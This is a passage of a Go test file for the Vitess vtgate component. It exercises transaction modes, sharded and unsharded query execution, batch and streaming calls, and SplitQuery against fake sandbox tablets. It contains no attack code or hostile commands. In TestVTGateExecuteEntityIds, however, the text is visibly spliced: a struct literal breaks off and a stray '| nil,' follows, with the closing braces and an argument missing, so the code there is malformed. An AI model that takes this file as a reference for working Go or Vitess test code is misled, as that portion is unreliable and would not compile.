"github.com/youtube/vitess/go/vt/vterrors"
"github.com/youtube/vitess/go/vt/vtgate/gateway"
"golang.org/x/net/context"
querypb "github.com/youtube/vitess/go/vt/proto/query"
topodatapb "github.com/youtube/vitess/go/vt/proto/topodata"
vtgatepb "github.com/youtube/vitess/go/vt/proto/vtgate"
vtrpcpb "github.com/youtube/vitess/go/vt/proto/vtrpc"
)
// This file uses the sandbox_test framework.
var hcVTGateTest *discovery.FakeHealthCheck
var executeOptions = &querypb.ExecuteOptions{
IncludedFields: querypb.ExecuteOptions_TYPE_ONLY,
}
func init() {
getSandbox(KsTestUnsharded).VSchema = `
{
"Sharded": false,
"Tables": {
"t1": {}
}
}
`
hcVTGateTest = discovery.NewFakeHealthCheck()
*transactionMode = "multi"
Init(context.Background(), hcVTGateTest, topo.Server{}, new(sandboxTopo), "aa", 10, nil)
}
func TestVTGateBegin(t *testing.T) {
save := rpcVTGate.transactionMode
defer func() {
rpcVTGate.transactionMode = save
}()
rpcVTGate.transactionMode = TxSingle
got, err := rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession := &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
_, err = rpcVTGate.Begin(context.Background(), false)
wantErr := "multi-db transaction disallowed"
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
rpcVTGate.transactionMode = TxMulti
got, err = rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
got, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
rpcVTGate.transactionMode = TxTwoPC
got, err = rpcVTGate.Begin(context.Background(), true)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
SingleDb: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
got, err = rpcVTGate.Begin(context.Background(), false)
if err != nil {
t.Error(err)
}
wantSession = &vtgatepb.Session{
InTransaction: true,
}
if !reflect.DeepEqual(got, wantSession) {
t.Errorf("Begin(single): %v, want %v", got, wantSession)
}
}
func TestVTGateCommit(t *testing.T) {
save := rpcVTGate.transactionMode
defer func() {
rpcVTGate.transactionMode = save
}()
session := &vtgatepb.Session{
InTransaction: true,
}
rpcVTGate.transactionMode = TxSingle
err := rpcVTGate.Commit(context.Background(), true, session)
wantErr := "2pc transaction disallowed"
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
rpcVTGate.transactionMode = TxMulti
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), true, session)
if err == nil || err.Error() != wantErr {
t.Errorf("Begin(multi): %v, want %s", err, wantErr)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
rpcVTGate.transactionMode = TxTwoPC
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), true, session)
if err != nil {
t.Error(err)
}
session = &vtgatepb.Session{
InTransaction: true,
}
err = rpcVTGate.Commit(context.Background(), false, session)
if err != nil {
t.Error(err)
}
}
func TestVTGateRollbackNil(t *testing.T) {
err := rpcVTGate.Rollback(context.Background(), nil)
if err != nil {
t.Error(err)
}
}
func TestVTGateExecute(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
qr, err := rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: KsTestUnsharded,
Shard: "0",
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
session, err = rpcVTGate.Begin(context.Background(), false)
rpcVTGate.Execute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
session,
false,
nil)
rpcVTGate.Rollback(context.Background(), session)
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
}
func TestVTGateExecuteWithKeyspace(t *testing.T) {
createSandbox(KsTestUnsharded)
hcVTGateTest.Reset()
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, KsTestUnsharded, "0", topodatapb.TabletType_MASTER, true, 1, nil)
qr, err := rpcVTGate.Execute(context.Background(),
"select id from none",
nil,
KsTestUnsharded,
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
_, err = rpcVTGate.Execute(context.Background(),
"select id from none",
nil,
"aa",
topodatapb.TabletType_MASTER,
nil,
false,
nil)
want := "keyspace aa not found in vschema, vtgate: "
if err == nil || err.Error() != want {
t.Errorf("Execute: %v, want %s", err, want)
}
}
func TestVTGateExecuteShards(t *testing.T) {
ks := "TestVTGateExecuteShards"
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_REPLICA, true, 1, nil)
qr, err := rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard,
TabletType: topodatapb.TabletType_REPLICA,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
session, err = rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_REPLICA,
session,
false,
nil)
rpcVTGate.Rollback(context.Background(), session)
if sbc.RollbackCount.Get() != 1 {
t.Errorf("want 1, got %d", sbc.RollbackCount.Get())
}
}
func TestVTGateExecuteKeyspaceIds(t *testing.T) {
ks := "TestVTGateExecuteKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x30}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Fatalf("ExecuteKeyspaceIds failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteKeyRanges(t *testing.T) {
ks := "TestVTGateExecuteKeyRanges"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
qr, err = rpcVTGate.ExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
session,
false,
nil)
if err != nil {
t.Errorf("want nil, got %v", err)
}
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %v", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteKeyRanges(context.Background(), "query",
nil,
ks,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x30}}},
topodatapb.TabletType_MASTER,
nil,
false,
nil)
if err != nil {
t.Fatalf("ExecuteKeyRanges failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteEntityIds(t *testing.T) {
ks := "TestVTGateExecuteEntityIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
qr, err := rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
nil,
false,
executeOptions)
if err != nil {
t.Errorf("want nil, got %v", err)
}
if !reflect.DeepEqual(sandboxconn.SingleRowResult, qr) {
t.Errorf("want \n%+v, got \n%+v", sandboxconn.SingleRowResult, qr)
}
if execCount := sbc1.ExecCount.Get(); execCount != 1 {
t.Errorf("want 1, got %v\n", execCount)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution in transaction
session, err := rpcVTGate.Begin(context.Background(), false)
if !session.InTransaction {
t.Errorf("want true, got false")
}
rpcVTGate.ExecuteEntityIds(context.Background(),
"query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
},
topodatapb.TabletType_MASTER,
session,
false,
nil)
wantSession := &vtgatepb.Session{
InTransaction: true,
ShardSessions: []*vtgatepb.Session_ShardSession{{
Target: &querypb.Target{
Keyspace: ks,
Shard: shard1,
TabletType: topodatapb.TabletType_MASTER,
},
TransactionId: 1,
}},
}
if !reflect.DeepEqual(wantSession, session) {
t.Errorf("want \n%+v, got \n%+v", wantSession, session)
}
rpcVTGate.Commit(context.Background(), false, session)
if commitCount := sbc1.CommitCount.Get(); commitCount != 1 {
t.Errorf("want 1, got %d", commitCount)
}
// Test for multiple shards
qr, err = rpcVTGate.ExecuteEntityIds(context.Background(), "query",
nil,
ks,
"kid",
[]*vtgatepb.ExecuteEntityIdsRequest_EntityId{
{
Type: sqltypes.VarBinary,
Value: []byte("id1"),
KeyspaceId: []byte{0x10},
},
{
Type: sqltypes.VarBinary,
Value: []byte("id2"),
KeyspaceId: []byte{0x30}, | nil,
false,
nil)
if err != nil {
t.Fatalf("ExecuteEntityIds failed: %v", err)
}
if qr.RowsAffected != 2 {
t.Errorf("want 2, got %v", qr.RowsAffected)
}
}
func TestVTGateExecuteBatchShards(t *testing.T) {
ks := "TestVTGateExecuteBatchShards"
createSandbox(ks)
shard1 := "-20"
shard2 := "20-40"
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
qrl, err := rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if len(qrl) != 2 {
t.Errorf("want 2, got %v", len(qrl))
}
if qrl[0].RowsAffected != 2 {
t.Errorf("want 2, got %v", qrl[0].RowsAffected)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteBatchShards(context.Background(),
[]*vtgatepb.BoundShardQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
Shards: []string{shard1, shard2},
}},
topodatapb.TabletType_MASTER,
false,
session,
nil)
if len(session.ShardSessions) != 2 {
t.Errorf("want 2, got %d", len(session.ShardSessions))
}
}
func TestVTGateExecuteBatchKeyspaceIds(t *testing.T) {
ks := "TestVTGateExecuteBatchKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
kid10 := []byte{0x10}
kid30 := []byte{0x30}
qrl, err := rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
nil,
executeOptions)
if err != nil {
t.Fatalf("want nil, got %v", err)
}
if len(qrl) != 2 {
t.Errorf("want 2, got %v", len(qrl))
}
if qrl[0].RowsAffected != 2 {
t.Errorf("want 2, got %v", qrl[0].RowsAffected)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
session, err := rpcVTGate.Begin(context.Background(), false)
rpcVTGate.ExecuteBatchKeyspaceIds(context.Background(),
[]*vtgatepb.BoundKeyspaceIdQuery{{
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}, {
Query: &querypb.BoundQuery{
Sql: "query",
BindVariables: nil,
},
Keyspace: ks,
KeyspaceIds: [][]byte{kid10, kid30},
}},
topodatapb.TabletType_MASTER,
false,
session,
nil)
if len(session.ShardSessions) != 2 {
t.Errorf("want 2, got %d", len(session.ShardSessions))
}
}
func TestVTGateStreamExecute(t *testing.T) {
ks := KsTestUnsharded
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_MASTER, true, 1, nil)
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecute(context.Background(),
"select id from t1",
nil,
"",
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
}
func TestVTGateStreamExecuteKeyspaceIds(t *testing.T) {
ks := "TestVTGateStreamExecuteKeyspaceIds"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution - multiple keyspaceids in single shard
qrs = nil
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x15}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want = []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
// Test for successful execution - multiple keyspaceids in multiple shards
err = rpcVTGate.StreamExecuteKeyspaceIds(context.Background(),
"query",
nil,
ks,
[][]byte{{0x10}, {0x30}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
}
func TestVTGateStreamExecuteKeyRanges(t *testing.T) {
ks := "TestVTGateStreamExecuteKeyRanges"
shard1 := "-20"
shard2 := "20-40"
createSandbox(ks)
hcVTGateTest.Reset()
sbc1 := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard1, topodatapb.TabletType_MASTER, true, 1, nil)
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1002, ks, shard2, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{End: []byte{0x20}}},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc1.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc1.Options[0], executeOptions)
}
// Test for successful execution - multiple shards
err = rpcVTGate.StreamExecuteKeyRanges(context.Background(),
"query",
nil,
ks,
[]*topodatapb.KeyRange{{Start: []byte{0x10}, End: []byte{0x40}}},
topodatapb.TabletType_MASTER,
nil,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
}
func TestVTGateStreamExecuteShards(t *testing.T) {
ks := "TestVTGateStreamExecuteShards"
shard := "0"
createSandbox(ks)
hcVTGateTest.Reset()
sbc := hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, ks, shard, topodatapb.TabletType_MASTER, true, 1, nil)
// Test for successful execution
var qrs []*sqltypes.Result
err := rpcVTGate.StreamExecuteShards(context.Background(),
"query",
nil,
ks,
[]string{shard},
topodatapb.TabletType_MASTER,
executeOptions,
func(r *sqltypes.Result) error {
qrs = append(qrs, r)
return nil
})
if err != nil {
t.Errorf("want nil, got %v", err)
}
want := []*sqltypes.Result{sandboxconn.SingleRowResult}
if !reflect.DeepEqual(want, qrs) {
t.Errorf("want \n%+v, got \n%+v", want, qrs)
}
if !proto.Equal(sbc.Options[0], executeOptions) {
t.Errorf("got ExecuteOptions \n%+v, want \n%+v", sbc.Options[0], executeOptions)
}
}
func TestVTGateSplitQuerySharded(t *testing.T) {
keyspace := "TestVTGateSplitQuery"
keyranges, err := key.ParseShardingSpec(DefaultShardSpec)
if err != nil {
t.Fatalf("got: %v, want: nil", err)
}
createSandbox(keyspace)
hcVTGateTest.Reset()
port := int32(1001)
for _, kr := range keyranges {
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", port, keyspace, key.KeyRangeString(kr), topodatapb.TabletType_RDONLY, true, 1, nil)
port++
}
sql := "select col1, col2 from table"
bindVars := map[string]interface{}{"bv1": nil}
splitColumns := []string{"sc1", "sc2"}
algorithm := querypb.SplitQueryRequest_FULL_SCAN
type testCaseType struct {
splitCount int64
numRowsPerQueryPart int64
}
testCases := []testCaseType{
{splitCount: 100, numRowsPerQueryPart: 0},
{splitCount: 0, numRowsPerQueryPart: 123},
}
for _, testCase := range testCases {
splits, err := rpcVTGate.SplitQuery(
context.Background(),
keyspace,
sql,
bindVars,
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm)
if err != nil {
t.Errorf("got %v, want: nil. testCase: %+v", err, testCase)
}
// Total number of splits should be number of shards as our sandbox returns a single split
// for its fake implementation of SplitQuery.
if len(keyranges) != len(splits) {
t.Errorf("wrong number of splits, got %+v, want %+v. testCase:\n%+v",
len(splits), len(keyranges), testCase)
}
actualSqlsByKeyRange := map[string][]string{}
for _, split := range splits {
if split.KeyRangePart.Keyspace != keyspace {
t.Errorf("wrong keyspace, got \n%+v, want \n%+v. testCase:\n%+v",
keyspace, split.KeyRangePart.Keyspace, testCase)
}
if len(split.KeyRangePart.KeyRanges) != 1 {
t.Errorf("wrong number of keyranges, got \n%+v, want \n%+v. testCase:\n%+v",
1, len(split.KeyRangePart.KeyRanges), testCase)
}
kr := key.KeyRangeString(split.KeyRangePart.KeyRanges[0])
actualSqlsByKeyRange[kr] = append(actualSqlsByKeyRange[kr], split.Query.Sql)
}
expectedSqlsByKeyRange := map[string][]string{}
for _, kr := range keyranges {
perShardSplitCount := int64(math.Ceil(float64(testCase.splitCount) / float64(len(keyranges))))
shard := key.KeyRangeString(kr)
expectedSqlsByKeyRange[shard] = []string{
fmt.Sprintf(
"query:%v, splitColumns:%v, splitCount:%v,"+
" numRowsPerQueryPart:%v, algorithm:%v, shard:%v",
querytypes.BoundQuery{Sql: sql, BindVariables: bindVars},
splitColumns,
perShardSplitCount,
testCase.numRowsPerQueryPart,
algorithm,
shard,
),
}
}
if !reflect.DeepEqual(actualSqlsByKeyRange, expectedSqlsByKeyRange) {
t.Errorf(
"splits contain the wrong sqls and/or keyranges, "+
"got:\n%+v\n, want:\n%+v\n. testCase:\n%+v",
actualSqlsByKeyRange, expectedSqlsByKeyRange, testCase)
}
}
}
func TestVTGateSplitQueryUnsharded(t *testing.T) {
keyspace := KsTestUnsharded
createSandbox(keyspace)
hcVTGateTest.Reset()
hcVTGateTest.AddTestTablet("aa", "1.1.1.1", 1001, keyspace, "0", topodatapb.TabletType_RDONLY, true, 1, nil)
sql := "select col1, col2 from table"
bindVars := map[string]interface{}{"bv1": nil}
splitColumns := []string{"sc1", "sc2"}
algorithm := querypb.SplitQueryRequest_FULL_SCAN
type testCaseType struct {
splitCount int64
numRowsPerQueryPart int64
}
testCases := []testCaseType{
{splitCount: 100, numRowsPerQueryPart: 0},
{splitCount: 0, numRowsPerQueryPart: 123},
}
for _, testCase := range testCases {
splits, err := rpcVTGate.SplitQuery(
context.Background(),
keyspace,
sql,
bindVars,
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm)
if err != nil {
t.Errorf("got %v, want: nil. testCase: %+v", err, testCase)
}
// Total number of splits should be number of shards (1) as our sandbox returns a single split
// for its fake implementation of SplitQuery.
if 1 != len(splits) {
t.Errorf("wrong number of splits, got %+v, want %+v. testCase:\n%+v",
len(splits), 1, testCase)
continue
}
split := splits[0]
if split.KeyRangePart != nil {
t.Errorf("KeyRangePart should not be populated. Got:\n%+v\n, testCase:\n%+v\n",
keyspace, split.KeyRangePart)
}
if split.ShardPart.Keyspace != keyspace {
t.Errorf("wrong keyspace, got \n%+v, want \n%+v. testCase:\n%+v",
keyspace, split.ShardPart.Keyspace, testCase)
}
if len(split.ShardPart.Shards) != 1 {
t.Errorf("wrong number of shards, got \n%+v, want \n%+v. testCase:\n%+v",
1, len(split.ShardPart.Shards), testCase)
}
expectedShard := "0"
expectedSQL := fmt.Sprintf(
"query:%v, splitColumns:%v, splitCount:%v,"+
" numRowsPerQueryPart:%v, algorithm:%v, shard:%v",
querytypes.BoundQuery{Sql: sql, BindVariables: bindVars},
splitColumns,
testCase.splitCount,
testCase.numRowsPerQueryPart,
algorithm,
expectedShard,
)
if split.Query.Sql != expectedSQL {
t.Errorf("got:\n%v\n, want:\n%v\n, testCase:\n%+v",
